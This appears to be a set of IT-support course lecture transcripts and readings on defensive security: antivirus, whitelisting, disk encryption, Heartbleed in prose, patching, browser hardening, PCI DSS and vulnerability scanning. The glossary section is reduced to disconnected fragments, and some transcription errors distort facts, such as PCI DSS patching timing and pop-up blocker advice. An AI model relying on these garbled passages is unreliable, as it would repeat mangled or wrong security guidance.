 A cybercriminal intercepts an employee’s work login credentials: An employee accesses their
work account using their laptop and an open Wi-Fi access point in a busy coffee shop. A
cybercriminal is in the same coffee shop to intercept and collect unprotected information flowing
through the open Wi-Fi access point. The cybercriminal obtains the employee’s user account
credentials and uses them to hijack the employee’s work account. The cybercriminal then begins a
malicious attack on the employer’s network. Microsoft Defender for Identity can detect the
sudden change in activity on the employee’s user account. Defender for Identity alerts the
employee and the IT Support team about the compromised user identity.
 A virus enters a cloud drive through a file upload: An employee unknowingly uploads an file that
is infected with a virus to their work cloud storage drive. When the employee opens the file from
the cloud drive, the virus is activated and begins changing the security settings on the other files in
the employees cloud drive. Microsoft Defender for Cloud Apps detects the unusual pattern of
activity and alerts the employee and IT Support team of the suspicious activity in the cloud
account.
User Account Control (UAC)
User Account Control (UAC) allows IT administrators to create standard user accounts with limited access
rights and privileges for end users. This configuration can prevent users from installing unauthorized
programs, changing system settings, tampering with firewalls, and more. In order to perform these types of
tasks, administrator credentials must be provided. For less restrictive controls, UAC provides the option to
grant end users local administrative privileges for approved activities that require administrative
privileges. For more restrictive controls, UAC can require global administrator credentials be entered for
each and every administrative change the user attempts to make.
To learn more about Microsoft Defender through the Microsoft learning portal, please visit:
 Microsoft Learn: Introduction to Microsoft 365 Defender - Microsoft’s self-paced course for
Microsoft 365 Defender
 Protect your organization with Microsoft 365 Defender - An interactive guide to Microsoft 365
Defender and how it detects security risks, investigates attacks, and prevents harmful activities.
 Microsoft Defender for Endpoint - Gives an overview of product, services, architecture, and training
opportunities.
 Microsoft Defender Vulnerability Management - Provides information about the services and tools
available to find and fix vulnerabilities.
 Microsoft Defender for Office 365 - Lists included services and tools for various product levels, as
well as the types of threats it protects against.
 Microsoft Defender for Identity - Offers product information, how-to guides, tutorials, and
reference information.
 Microsoft Defender for Cloud Apps - Provides product overview, quickstart reference guide,
tutorials, best practices, and additional resources.
 How User Account Control works - User Account Control (UAC) is a fundamental component of
Microsoft's overall security vision. UAC helps mitigate the impact of malware.
Anti malware defenses are a core part of any company's security model in this
day and age.
So, it's important as an IT support specialist to know what's out there.
Today, the Internet is full of bots, viruses, worms and
other automated attacks.
Lots of unprotected systems would be compromised in a matter of minutes if
directly connected to the Internet without any safeguards or protections in place.
And they need to have critical system updates.
While modern operating systems have reduced this threat vector by having basic
firewalls enabled by default,
there's still a huge amount of attack traffic on the Internet.
Anti malware measures play a super important role in keeping this type of
attack off your systems and helping to protect your users.
Antivirus software has been around for a really long time.
But some security experts question the value it can provide to a company,
especially since more sophisticated malware and
attacks have been spun up in recent years.
Antivirus software is signature-based.
This means that it has a database of signatures that identify known
malware like the unique file hash of a malicious binary or
the file associated with an infection.
Or it could be the network traffic characteristics that malware uses to
communicate with a command and control server.
Antivirus software will monitor and analyze things like new files being
created or being modified on the system in order to watch for
any behavior that matches a known malware signature.
If it detects activity that matches the signature, depending on the signature
type, it will attempt to block the malware from harming the system.
But some signatures might only be able to detect the malware after the infection
has occurred.
In that case, it may attempt to quarantine the infected files.
If that's not possible, it'll just log and alert the detection event at a high level.
This is how all antivirus products work.
There are two issues with antivirus software though.
The first is that they depend on antivirus signatures distributed by
the antivirus software vendor.
The second is that they depend on the antivirus vendor discovering new malware
and writing new signatures for newly discovered threats.
Until the vendor is able to write new signatures and publish and
disseminate them,
your antivirus software can't protect you from these emerging threats boo.
Antivirus which is designed to protect systems,
actually represents an additional attack surface that attackers can exploit.
You might be thinking, wait,
our own antivirus tools can be another threat to our system.
What's the deal with that?
Well, this is because of the very nature of one antivirus engine must do.
It takes arbitrary and potentially malicious binaries as input and
performs various operations on them.
Because of this,
there are a lot of complex code where very serious bugs could exist.
Exactly, this kind of vulnerability was found in
the sofas antivirus engine back in 2012.
So, it sounds like antivirus software is an ideal and
has some pretty large drawbacks.
Then why are we still recommending it as a core piece of security design?
The short answer is this,
it protects against the most common attacks out there on the Internet.
The really obvious stuff that still poses a threat to your systems still needs to be
defended against.
Antivirus is an easy solution to provide that protection.
It doesn't matter how much user education you instill in your employees, there will
still be some folks who will click on an email that has an infected attachment.
A good way to think about antivirus in today's very noisy external threat
environment, is like a filter for the attack noise on the internet today.
It lets you remove the background noise and
focus on the more important targeted or specific threats.
Remember, our defense and depth concept involves multiple layers of protection.
Antivirus software is just one piece of our anti malware defenses.
If antivirus can't protect us from the threats we don't know about,
how do we protect against the unknown that's out there?
Well, anti virus operates on a blacklist model,
checking against a list of known bad things and blocking what gets matched.
There's a class of anti malware software that does the opposite.
Binary whitelisting software operates off a white list.
It's a list of known good and trusted software and
only things that are on the list are permitted to run.
Everything else is blocked.
You can think of this as applying the implicit denial tackle rule to software
execution.
By default, everything is blocked.
Only things explicitly allowed to execute are able to.
I should call out that this typically only applies to executable binaries,
not arbitrary files like pdf documents or text files.
This would naturally defend against any unknown threats but
at the cost of convenience.
Think about how frequently you download and install new software on your machine.
Now, imagine if you had to get approval before you could download and
install any new software, that would be really annoying, don't you think?
Now, imagine that every system update had to be white listed before it could be
applied.
Obviously, not trusting everything wouldn't be very sustainable.
It's for this reason that binary whitelisting software can trust software
using a couple different mechanisms.
The first is using the unique cryptographic hash of binaries
which are used to identify unique binaries.
This is used to whitelist individual executables.
The other trust mechanism is a software signing certificate.
Remember back when we discussed public key cryptography and
signatures using public and private key pairs, software signing or
code signing is the same idea but applied to software.
A software vendor can cryptographically sign binaries they
distribute using a private key.
The signature can be verified at execution time by checking the signature
using the public key embedded in the certificate and
verifying the trust chain of the public key.
If the hash matches and the public key is trusted, then the software can be verified
that it came from someone with the software vendors code signing private key.
Binary whitelisting systems can be configured to trust specific vendors
code signing certificates.
They permit all binary signed with that certificate to run.
This is helpful for automatically trusting content, like system updates along with
software and common use that comes from reputable and trusted vendors.
But can you guess the downside here?
Each new code signing certificate that's trusted represents an increase in attack
surface.
An attacker could compromise the code signing certificate of a software vendor
that your company trusts.
And use that to sign malware that targets your company.
That would bypass any binary whitelisting defenses in place.
Not good.
This exact scenario happened back in 2013, [INAUDIBLE].
A binary whitelisting software company.
Hackers managed to breach their internal network and
found an unsecured virtual machine.
It had a copy of the code signing certificates private key.
They stole that key and used it to sign malware that would have been trusted by
all [INAUDIBLE] software installations by default.
Supplemental Readings for Antimalware

Protection
Learn how long it would take for an unprotected system to be compromised by bots, viruses, and worms in
the link here.
If you're interested in why security experts question the value of antivirus software, check out the link here.
If you want to read about how the Sophos antivirus system was maliciously compromised, see the link
here.
If you want to learn how hackers bypassed the binary whitelisting defenses that were in place for a
software vendor, check out the link here.
We briefly discussed disk encryption earlier when we talked about encryption at
a high level.
Now it's time to dive deeper.
Full disk encryption or
FDE is an important factor in a defense in depth security model.
It provides protection from some physical forms of attack.
As an IT Support specialist,
you likely assist with implementing an FDE solution if one doesn't exist already.
Help with migrating between FDE solutions and troubleshoot issues with
FDE systems like helping with forgotten passwords, so FDE is key.
Systems with their entire hard drive's encrypted are resilient against
data theft.
They'll prevent an attacker from stealing potentially confidential information from
a hard drive that's been stolen or lost.
Without also knowing the encryption password or having access to
the encryption key the data on the hard drive is just meaningless gibberish.
This is a very important security mechanism to deploy for
more mobile devices like laptops, cell phones and tablets.
But it's also recommended for desktops and servers to since disk encryption not
only provides confidentiality but also integrity.
This means that an attacker with physical access to a system
can't replace system files with malicious ones or install malware.
Having the disk fully encrypted protects from data theft and
unauthorized tampering even if an attacker has physical access to the disk.
Supplemental Reading for Disk Encryption

There are first-party full-disk encryption (FDE) solutions from Microsoft and Apple, called BitLocker and
FileVault 2, respectively.
There are also a bunch of third-party and open-source solutions. On Linux, the dm-crypt package is very
popular.
There are also offerings from PGP, VeraCrypt and a host of others.
[MUSIC]
I think self learning is the key to success in this particular field.
Technology changes all the time and
you have to have a drive to learn about the new things coming out.
And you're only going to get that if you are constantly keeping on top
of what's going on and the more you do that,
the more of an expert you become in lots of different areas.
And by becoming an expert in them it propels you forward because if you can
be the expert in the room you can teach others and you can also be the person
that people rely on and it also builds your confidence over time.
There are people who specialize deeply insecurity and
that's all they do all day long.
But in fact every person who works at Google is a security person.
I think the IT support role is an incredibly pivotal role within Google from a security standpoint and in many
cases is the IT support
people who will see Google being hacked for the first time.
Had I not had an IT support experience early in my career,
I probably wouldn't be able to bring the perspective that I do to the table in
terms of how we make security better for everyone.
[SOUND]
While some parts of software features are exposed,

a lot of attacks depend on exploiting bugs and software.
This triggers obscure and unintended behavior,
which can lead to a compromise of the system running the vulnerable software.
These types of vulnerabilities can be fixed through software patches and
updates which correct the bugs that the attackers exploit.
it's critical that you make sure that you install software updates and security
patches in a timely way in order to defend your company's systems and networks.
Software updates don't just improve software products by adding new features
and improving performance, and stability.
They also address security vulnerabilities.
There are some software bugs that are present in the core functionality of
the software in question.
This means that the vulnerability can't be mitigated by disabling the vulnerable
service, not good.
An example of this was the heartbleed vulnerability.
A bug in the open source TLS library, open SSL.
This was discovered and widely publicized in April of 2014.
The bug showed up in how the library handled TLS heartbeat messages.
Their special messages that allow one party in the TLS session to signal to
the other party that they like the session to be kept alive.
This works by sending a TLS heartbeat request message,
a packet that has a text string and the length of the string.
The receiving end is supposed to reply with the same text string in response.
So if the heartbeat request message contains the text,
I'm still alive and the length of 15,
the receiving end would reply back with the same text, I am still alive.
But the bug in the open SSL library was that the replying side would allocate
memory space according to the value in the received packet.
This was based on the specified length of the string like it's defined in
the packet, not based on the actual length of the string.
The value was not verified.
This meant that an attacker could send a malformed heartbeat request
message with a much larger length specified than what was allowed.
The reply would contain the original text message, but
would also include bits of memory from the replying system.
So an attacker could send a malformed heartbeat request message
containing the text I'm still alive, but
with a length of 500 because the length value wasn't verified.
This means that the response back would be I'm still alive followed by
the next 485 characters in memory.
So it was possible for an attacker to read up to 64 kilobytes of a target's memory.
This memory was likely used before by open SSL library,
so it might contain sensitive information regarding other TLS sessions.
This bug meant that it was feasible for an attacker to recover the private keys used
to protect TLS sessions, this would allow them to decrypt TLS protected sessions and
recover details like login credentials.
This is a great example of a mistake in the code leading to a very high profile
software vulnerability.
It could only be fixed or a software update or
switching to a different TLS library entirely.
While the heartbeat functionality is enabled by default,
it's possible to disable it in the open SSL library, but
it wasn't a simple argument to pass to an application.
Disabling this functionality required compiling the library with a flag that was
specified to disable heartbeats,
then you had to replace the installed version with the custom compiled one.
That's not something most people will do.
This was also a library wildly used by both server applications and
client applications.
This means that it might not be possible to replace the open SSL library with
a customized version or a different library.
The only way to address the vulnerability and client software that implemented
open SSL was to wait for a patch from the software vendor, what a mess?
Here's the bad news.
With software continuing to grow more complex over time,
these types of bugs are likely to become more commonplace.
Attackers will be looking for exactly this type of vulnerability.
The best protection is to have a good system and policy in place for
your company.
The system should be checking for, distributing and
verifying software updates for software deployment.
This is a complex problem when considering a large organization with many machines to
manage that run a variety of software products.
This is where management tools can help make this task more approachable for you.
Solutions like Microsoft SCCM or Puppet labs, Puppet and
factor tools allow administrators to get an overview of what software is
installed across their fleet of managed systems.
This lets the security team analyze what specific software and versions
are installed to better understand the risk of vulnerable software in the fleet.
When updates are released and pushed to the fleet,
these reporting tools can help make sure that the updates have been applied.
SCCM, even has the ability to force install updates after a specified deadline
has passed.
Patching isn't just necessary for software, but also operating systems and
firmware that run on infrastructure devices.
Every device has code running on it that might have software bugs that could lead
to security vulnerabilities from routers, switches, phones, even printers.
Operating system vendors usually push security related patches pretty quickly
when an issue is discovered.
They'll usually release security fixes out of cycle from typical OS upgrades to
ensure a timely fix, because of the security implications.
But for embedded devices like network and equipment or printers,
this might not be typical.
Critical infrastructure devices should be approached carefully when you apply
updates.
There's always the risk that a software update will introduce a new bug that might
affect the functionality of the device or
if the update process itself would go wrong and cause an outage.
I hope you can see the importance of applying software patches and
firmware updates in a timely fashion.
It would be pretty embarrassing if you wind up being compromised by
a vulnerability that could have been easily fixed with a software update.
Browser Hardening
Browser Hardening
In this reading, you will learn how to harden browsers for enhanced internet security. The methods
presented include evaluating sources for trustworthiness, SSL certificates, password managers, and
browser security best practices. Techniques for browser hardening are important components in
enterprise-level IT security policies. These techniques can also be used to improve internet security for
organizations of any size and for individual users.
Identifying trusted versus untrusted sources
Some cybercriminals monitor SEO search terms for popular software downloads. Then they create fake
websites to pose as hosts for these popular downloads. They might even use advertising and stolen logos
of trusted companies to make the sites appear to be legitimate businesses. However, the downloadable
files available on the cybercriminals’ websites are usually malicious software. Unaware of the deception,
users download and install the malware. In some cases, the users don’t even need to download a file.
Savvy cybercriminals can design web pages that have the ability to infect users’ devices simply upon
visiting the sites.
To guard against threats like this, there are checks you can perform to evaluate websites:
 Use antivirus and anti-malware software and browser extensions. Run antivirus and anti-
malware scans regularly and scan downloaded files. Ensure antivirus and anti-malware browser
extensions are enabled when surfing the web.
 Check for SSL certificates. See the “Secure connections and sites” section below.
 Ensure the URL displayed in the address bar shows the correct domain name. For example,
Google websites use the Google.com domain name.
 Search for negative reviews of the website from trusted sources. Be wary of websites that have
few to no reviews. They may not have been active long enough to build a bad reputation.
Cybercriminals will create new websites when they get too many negative reviews on their older
sites.
 Don’t automatically trust website links provided by people or organizations you trust. They may
not be aware that they are passing along links to malicious websites and files.
 Use hashing algorithms for downloaded files. Compare the developer-provided hash value of the
original file to the hash value of the downloaded copy to ensure the two values match.
Secure connections and sites
Secure Socket Layer (SSL) certificates are issued by trusted certificate authorities (CA), such as DigiCert. An
SSL certificate indicates that any data submitted through a website will be encrypted. A website with a
valid SSL certificate has been inspected and verified by the CA. You can find SSL certificates by performing
the following steps:
1. Check the URL in the address bar. The URL should begin with the https:// protocol. If you see
http:// without the “s”, then the website is not secure.
2. Click on the closed padlock icon in the address bar to the left of the URL. An open lock indicates
that the website is not secure.
3. A pop-up menu should open. Websites with SSL certificates will have a menu option labeled
“Connection is secure.” Click on this menu item.
4. A new pop-up menu will appear with a link to check the certificate information. The layout and
wording of this pop-up will vary depending on which browser you are using. When you review the
certificate, look for the following items:4
a. The name of the issuer - Make sure it is a trusted certificate authority.
b. The domain it was issued to - This name should match the website domain name.
c. The expiration date - The certificate should not have passed its expiration date.
Note that cybercriminals can obtain SSL certificates too. So, this is not a guarantee that the site is safe. CAs
also vary in how thorough they are in their inspections.
Password managers
Password managers are software programs that encrypt and retain passwords in secure cloud storage or
locally on users’ personal computing devices. There are a wide variety of activities users perform online
that require unique and complex passwords, such as banking, managing health records, filing taxes, and
more. It can be difficult for users to keep track of so many different logins and passwords. Fortunately,
password managers can help.
 Advantages of using a password manager:

o It provides only one password for a user to remember;
o Can generate and store secure passwords that are difficult for cybercriminal tools to crack;
o Is more secure than keeping passwords written down on paper or in an unencrypted file
on a computer; and
o Work across multiple devices and operating systems.
 Disadvantages of using a password manager:
o It can expose all of the user’s account credentials if a cybercriminal obtains the master
password to the password manager;
o Can be very difficult for a user to regain access to the password manager account if the
master password is lost or forgotten;
o Requires the user to learn a new method for logging in to their various accounts in order to
retrieve passwords from the password manager software; and
o Often requires a fee or subscription for password management services.
A few of the top brands for password manager applications include Bitwarden, Last Pass, and 1Password.
Please see the Resource section at the end of this reading for more information.
Browser settings
Browser settings can be configured for additional safety measures. Some additional options for hardening
browsers include:
1. Use pop-up blockers: Disable Web Browser Pop-up Blockers

2. Clear browsing data and cache: Clear your web browser's cache, cookies, and history
3. Use private-browsing mode: How to Turn on Incognito Mode in Your Browser
4. Sign-in/browser data synchronization:
a. Turn sync on and off in Chrome
b. Disable Firefox Sync
c. Change and customize sync settings in Microsoft Edge
5. Use ad blockers: How to block ads
Key takeaways
You learned about multiple steps you can take to harden a browser and protect your online security:
 Identify if sources can be trusted or not:

o Use antivirus and anti-malware software and browser extensions.
o Check for SSL certificates.
o Ensure the URL displayed in the address bar shows the correct domain name.
o Search for negative reviews of the website from trusted sources.
o Don’t automatically trust website links provided by people or organizations you trust.
 Use a password manager
 Configure your browser settings:
o Use pop-up blockers.
o Clear browsing data and cache.
o Use private-browsing mode.
o Sign-in/browser data synchronization.
o Use ad blockers.
To learn more about hardening bowsers for safer web surfing, please visit the following articles:
 Dubious downloads: How to check if a website and its files are malicious - Provides information on
evaluating websites and downloads for the presence of malware.
 The Best Password Managers to Secure Your Digital Life - Compares and contrasts the top
password managers on the market.
 Avoiding Social Engineering and Phishing Attacks - Tips for avoiding an array of internet scams.
 Blocking Unnecessary Advertising Web Content - From the United States National Security Agency
Cybersecurity Information, notice about ad-blocking through network functions, at the host level,
and other concerns.
 Securing Web Browsers and Defending Against Malvertising for Federal Agencies - From the United
States Cybersecurity and Infrastructure Security Agency, guide for protecting computing systems
from malvertising.
 Browser sync—what are the risks of turning it on? - Explains the security threats associated with
having browsers set to synchronize account data across multiple devices.
 List of Participants - Microsoft Trusted Root Program - Microsoft’s list of trusted Certificate
Authorities and the common names of the issued certificates.
As you can see, application software

can represent a pretty large attack surface.
This is especially true when it comes to
a large fleet of systems used throughout an organization.
It's important to have
some kind of application policies in place.
These policies serve two purposes.
Not only do they define
boundaries of what applications are permitted or not,
but they also help educate folks
on how to use software more securely.
We've seen the risks that software can
pose because of security vulnerabilities.
It makes sense to have a policy around
applying software updates in a timely way.
Common recommendation or even a requirement is to only
support or require the latest version
of a piece of software.
From the IT support perspective,
this is important because software updates
were often fix issues that someone may be encountering.
But from the security side of things,
making sure the latest version of
the software will ensure
that all security patches have been applied,
and the most secure version is in use.
This should be clearly called out in a policy.
People tend to be pretty lazy about
applying updates to software that they use a lot.
Lots of times, applying
an update requires restarting the application,
which can feel inconvenient and disruptive to users.
It's generally a good idea to
disallow risky classes of software by policy.
Things like file-sharing software
and piracy-related software tend
to be closely associated with malware infections.
They usually don't have a business use either.
Let's not even talk about
the legal implications of this type of software.
Understanding what your users need to do their jobs
will help shape your approach to
software policies and guidelines.
If there's a common use case
for a certain type of software,
it would be helpful to select
a specific software implementation
and require the use of that solution.
This led to evaluate the most secure solution,
and benefit from a more uniform software installation.
Remember, the name of the game
is to minimize attack surfaces.
Each piece of software that
accomplishes the same thing represents
a different set of
potential attack surfaces that
could have a vulnerability lurking inside.
Helping your users accomplish tasks by recommending or
supporting specific software makes
for a more secure environment.
It also helps users by giving them
clear solutions to accomplish tasks.
If you want to employ a binary waitlisting solution,
it's also important to define
a policy around what type of software can be waitlisted.
It's probably unnecessary to have video games
waitlisted unless your company
is a video game studio, of course.
These policies usually require some business use case or
justification to avoid a lot
of one-off personal software requests.
Another class of software
that you might want to have policies
defined for are browser extensions or add-ons.
Since a lot of workflows live
exclusively within the web browser now,
they represent a potential vector
for malware that often gets overlooked.
Extensions that require full access
to websites visited can be risky,
since the extension developer has
the power to modify pages visited.
Some extensions may even send
user input to a remote server.
This could potentially leak confidential information.
Clearly defining classifications of risky extensions and
add-ons will help protect
your systems and provide guidance to your users.
But policies are usually not enough to arm
users with the information they
need to make informed choices.
Their decisions can impact
the security of your organization.
That's where education and training comes into play.
We went over a lot of really dense information
on security in these lessons.
Take time to review some of
the videos so that it really sinks in.
Module 5 Glossary
Antivirus software: It monitors and analyze things like new files being created or being
modified on the system in order to watch for any behavior that matches a known malware
signature
Application policies: Defines boundaries of what applications are permitted or not, but they
also help educate folks on how to use software more securely
Attack surface: It's the sum of all the different attack vectors in a given system
Attack vector: Method or mechanism by which an attacker or malware gains access to a

network or system
Bastion hosts or networks: A server used to provide access to a private network from an
external network
Binary whitelisting software: It's a list of known good and trusted software and only things
that are on the list are permitted to run
Defense in depth: The concept of having multiple overlapping systems of defense to protect
IT systems
File-based encryption: Guarantees confidentiality and integrity of files protected by
encryption
Host-based firewalls: Protects individual hosts from being compromised when they're used
in untrusted and potentially malicious environments
Key escrow: Allows encryption key to be securely stored for later retrieval by an authorized
party
Normalization: It's the process of taking log data in different formats and converting it into a
standardized format that's consistent with a defined log structure
Platform key: It's the public key corresponding to the private key used to sign the boot files
Secure boot protocol: It uses public key cryptography to secure the encrypted elements of
the boot process
Security information and event management systems (SIEMS): Form of centralized logging
for security administration purposes
Software signing certificate: Trust mechanism where a software vendor can

cryptographically sign binaries they distribute using a private key

A

access to
should have it
something

longer valid
longer valid
with


of attacks
packets
into ciphertext

protocol
protocol
ciphertext

I
should be denied

IPv6

except for the key
L

the DAP

MD5: A popular and widely used hash function designed in the early 1990s as a cryptographic
hashing function
and clients



data with
to
Function 2
lock
Public key signatures: Digital signature generated by composing the message and combining
it with the private key

messages over time
sort of ransom
S

certificate
sent back and forth
published in 1995
secure
Single Sign-on (SSO): An authentication concept that allows users to authenticate once to
be granted access to a lot of different services and applications
of computers
database
to
ciphertext
decrypt messages


with new headers
network to another


public keys
network

X
of TACACS
If you're responsible for an organization of users,

there's a delicate balance between
security and user productivity.
We've seen this balance in action when we dove
into the different security tools and systems together.
Before you start to design a security architecture,
you need to define exactly what
you'd like it to accomplish.
This will depend on what
your company thinks is most important.
It will probably have a way it wants
different data to be handled and stored.
You also need to know if your company has
any legal requirements when it comes to security.
If your company handles credit card payments,
then you have to follow the PCI DSS,
or Payment Card Industry Data Security Standard
depending on local laws.
We'll take a closer look at PCI DSS,
which is a great example of
clearly defined security goals.
PCI DSS is broken into six broad objectives,
each with some requirements.
The first objective is to build and
maintain a secure network and systems.
This includes the requirements to install and
maintain a firewall configuration
to protect cardholder data,
and to not use vendor supplied
defaults for system passwords
and other security parameters.
As you can tell, the requirements
are related to the objective.
The objective is the end goal
for what we'd like to achieve.
Requirements are the actions
that can help achieve that goal.
PCI DSS goes into
more detailed actions for each requirement.
It provides more specific guidance around
what a firewall configuration should control.
For example, a secure firewall configuration
should restrict connections
between untrusted networks and
any systems in the cardholder data environment.
That's a little generic,
but it does give us some guidance
on how to meet the requirements.
The second objective category
is to protect cardholder data.
In this objective, the first requirement
is to protect stored cardholder data.
The second is to encrypt the transmission of
cardholder data across open public networks.
I want to call out again how the broad objective is to
protect sensitive data that's
stored in systems within our control.
The requirements give us
specific guidelines on how to get this done.
The specifics of these requirements
help clarify some of the points,
like what constitutes an open network.
They also recommend using
strong cryptography and offer some examples.
But not all requirements are technical in nature.
Let's look at the requirement to protect
stored cardholder data, for example.
it has requirements for
data retention policies to make sure
that sensitive payment information
isn't stored beyond the time it's required.
Once payment is authorized,
authentication data shouldn't be needed
anymore and it should be securely deleted.
This highlights the fact that
good security defenses aren't just technical in nature.
They are also procedural and policy-based.
The third objective is to
maintain a vulnerability management program.
The first requirement is to protect all systems against
malware and regularly update
antivirus software or programs.
The second is to develop and
maintain secure systems and applications.
You'll find more detailed implementation procedures
within these requirements.
They'll cover things like ensuring all systems have
anti-virus software installed and
making sure the software is kept up-to-date.
They also require that scans are run
regularly and logs are maintained.
There are also requirements for
ensuring systems and software are
protected against known vulnerabilities by applying
security patches at least one
month from the release of a security patch.
Use of third-party security
vulnerability databases is also
listed to help identify
known vulnerabilities within managed systems.
The fourth objective is to
implement strong access control measures.
This objective has three requirements.
The first is to restrict access to
cardholder data by business need to know.
The second is to identify and
authenticate access to system components.
The third is to restrict
physical access to cardholder data.
This highlights the importance of
good access control measures
along with good data access policies.
The first objective, restricting
access to data by business need to know,
means that any sensitive data should be directed to
data access policies to make
sure that customer data isn't misused.
Part of this requirement is to
enforce password authentication for
system access and
two-factor authentication for remote access.
That's the minimum requirement.
Another important piece highlighted by
the PCI DSS requirements
is access control for physical access.
This is a critical security aspect
to keep in mind since we need to
protect systems and data from
both physical theft and virtual attacks.
The fifth objective is to
regularly monitor and test networks.
The first requirement is to track and
monitor all access to
network resources and cardholder data.
The second is to regularly
test security systems and processes.
The requirement for network monitoring and
testing is another essential part
of a good security plan.
This refers to things like setting up and configuring
intrusion detection systems and
conducting vulnerability scans of the network,
which we'll cover a bit more later.
Testing defenses is another super important part of this.
Just having the systems in place isn't enough.
It's really helpful to test defense systems
regularly to make sure that
they provide the protection that you want.
It also ensures that the alerting systems are functional.
The sixth and final objective is to
maintain an information security policy.
It only has one requirement to maintain
a policy that addresses
information security for all personnel.
This requirement addresses why we need to
have well-established security policies.
They help govern and regulate
user behavior when it comes
to information security aspects.
It's important to call out that this requirement
mentions that the policies should be for all personnel.
The responsibility of information security
isn't only on the security teams.
Every member of an organization is
responsible for information security.
Well-designed security policies address
the most common questions or use
cases that users would have based
on the specific details of the organization.
Everyone that uses systems on
your organization's network is
able to get around security.
They might not mean to,
but they can reduce the overall security
with their actions and practices.
That's why having well-thought-out security policies in
place also need to be easy to find and easy to read.
Security is all about determining risks or exposure,

understanding the likelihood of attacks,
and designing defenses around
these risks to minimize the impact of an attack.
This thought process is actually something that everyone
uses in their daily life whether they know it or not.
Think of when you cross a busy intersection,
you assess the probability of being hit by
an oncoming car and minimize
that risk by choosing the right time to cross the road.
Security risk assessment starts with threat modeling.
First, we identify likely threats to our systems,
then we assign them priorities that
correspond to severity and probability.
We do this by brainstorming from
the perspective of an outside attacker,
putting ourselves in a hacker shoes.
It helps to start by figuring out
what high-value targets an attacker may want to go after.
From there, you can start to look at
possible attack vectors that could be
used to gain access to high-value assets.
High-value data usually includes
account information like usernames and passwords.
Typically, any kind of
user data is considered high-value,
especially if payment processing is involved.
Another part of risk measurement is understanding
what vulnerabilities are on your systems and network.
One way to find these out is to
perform regular vulnerability scanning.
There are lots of open-source and
commercial solutions that you can use.
They can be configured to perform
scheduled automated scans of
designated systems or networks
to look for vulnerabilities,
then they generate a report.
Some of these tools are Nessus,
OpenVAS, and Qualys.
Let me break down what vulnerability scanners do.
Heads-up. This might be a little dense,
so feel free to go over it again.
Vulnerability scanners are services
that run on your system
within your control that conduct
periodic scans of configured networks.
The service then conducts scans to
find and discover hosts on the network.
Once hosts are found,
either through a ping sweep or port scanning,
more detailed scans are run against discovered hosts.
Scans upon scans upon scans.
A port scan of
either common ports or all possible valid ports is
conducted against discovered hosts
to determine what services are listening.
These services are then probed
to try to discover more info
about the type of service and
what version is listening on the relevant port.
This information can then be checked
against databases of known vulnerabilities.
If a vulnerable version of a service is discovered,
the scanner will add it to its report.
Once the scan is finished,
the discovered vulnerabilities and
hosts are compiled in a report.
That way an analyst can quickly and
easily see where the problem areas are on the network.
Found vulnerabilities are prioritized
according to severity and other categorization.
Severity takes into account a number of things
like how likely the vulnerability is to be exploited.
It also considers the type of
access the vulnerability would provide to
an attacker and whether or not it
can be exploited remotely or not.
Vulnerabilities and the report will have links
too detailed and disclose information
about the vulnerability.
In some cases, it will also
have recommendations on how to get rid of it.
Vulnerability scanners will detect lots of things ranging
from misconfigured services
that represent potential risks,
to detecting the presence of backdoors in systems.
It's important to call out that
vulnerability scanning can only detect known
and disclosed vulnerabilities
and insecure configurations.
That's why it's important for you to have
an automated vulnerability scan conducted regularly.
You'll also need to keep the vulnerability database
up-to-date to make sure
new vulnerabilities are detected quickly.
But vulnerability scanning isn't
the only way to put your defenses to the test.
Conducting regular penetration tests is
also really encouraged to test your defenses even more.
These tests will also ensure
detection and alerting systems are working properly.
Penetration testing is the practice
of attempting to break
into a system or network to verify the systems in place.
Think of this as playing the role of
a bad guy for educational purposes.
This exercise isn't designed
to see if you have the acting chops.
It's intended to make you think like an attacker
and use the same tools and techniques they would use.
This way you can test your systems to
make sure they protect you like they're supposed to.
The results of the penetration testing reports will
also show you where weak points or blind spots exist.
These tests help improve
defenses and guide future security projects.
They can be conducted by members
of your in-house security team.
If your internal team doesn't
have the resources for this exercise,
you can hire a third-party company that
offers penetration testing as a service.
You can even do both.
That would help give you more perspectives on
your defense systems and you'll get
a more comprehensive test this way.
Supplemental Reading for Risk in the

Workplace
For more detailed information on this video lecture, check out the following tools:
Nessus, OpenVAS, and Qualys.
PRIVATE POLICIES
When you're supporting systems that handle customer data,

it's super-important to protect it
from unauthorized and inappropriate access.
It's not to defend against external threats.
It also protects the data against misuse by employees.
This type of behavior would fall under
your company's privacy policies.
Privacy policies oversee the access
and use of sensitive data.
They also define what appropriate
and authorized use is and
what provisions or restrictions are in
place when it comes to how the data is used.
Keep in mind that people might not consider
the security implications of their actions.
Both privacy and data access policies
are important to guiding
and informing people how to maintain
security while handling sensitive data.
Having defined in well-established privacy policies
is an important part of good privacy practices.
But you also need a way to enforce these policies.
Periodic audits on cases where
sensitive data was accessed can get you there.
This was enabled by our logging and monitoring systems.
Auditing data access logs is super important.
It helps us ensure that
sensitive data is only accessed by
people who are authorized to access
it and that they use it for the right reasons.
It's good practice to apply
the principle of least privilege here.
By not allowing access to this type of data by default,
you should require anyone that needs access to first make
an access request with
a justification for getting the data.
But it can't be vague or a generic requests for access.
They should be required to
specify what data they need access to.
Usually, this type of requests would also
have a time limit that should be
called out in the request.
That way, you can ensure that data access is
only permitted for legitimate business reasons,
which reduces the likelihood of
inappropriate data access or
usage by logging each data access request,
an actual data access.
We can also correlate requests with usage.
Any access that doesn't have
a corresponding request should be flagged as
a high priority potential breach
that needs to be investigated as soon as possible.
Company policies act as our guidelines and
informational resources on how
and how not to access and handle data.
They're equally important here.
Policies will range from
sensitive data handling to public communications.
Data handling policies should cover
the details of how different data is classified.
What makes some data sensitive
as opposed to non-sensitive?
What's considered confidential data?
Well, once different data classes are defined,
you should create guidelines around
how to handle these different types of data.
If something is considered sensitive or confidential,
you'd probably have stipulations that this data
shouldn't be stored on media
that's easily lost or stolen,
like USB sticks or portable hard drives.
There are also commonly used
without any encryption at all.
Imagine if one of your employees lost
an unencrypted portable hard drive full
of customer information, disaster.
That's exactly the situation
a data access policy tries to avoid.
It might also make sense to include
laptops and mobile devices,
like phones and tablets in
the removable media classification.
Since these devices are easily lost or stolen,
even though they're more commonly encrypted these days,
the loss and theft rate is much higher.
You may not like users storing
sensitive data on removable media,
but sometimes you're out of luck.
There may be an occasion where that's
the only solution to accomplish a task.
If this is the case,
it would help to have recommendations on how to
handle the situation in a secure way.
You could offer an appropriate encryption solution
and provide instructions and support on its use.
Data Destruction
Data destruction is removing or destroying data stored on electronic devices so that an
operating system or application cannot read it. Data destruction is required when a company
no longer needs a device, when there are unused or multiple copies of data, or you are
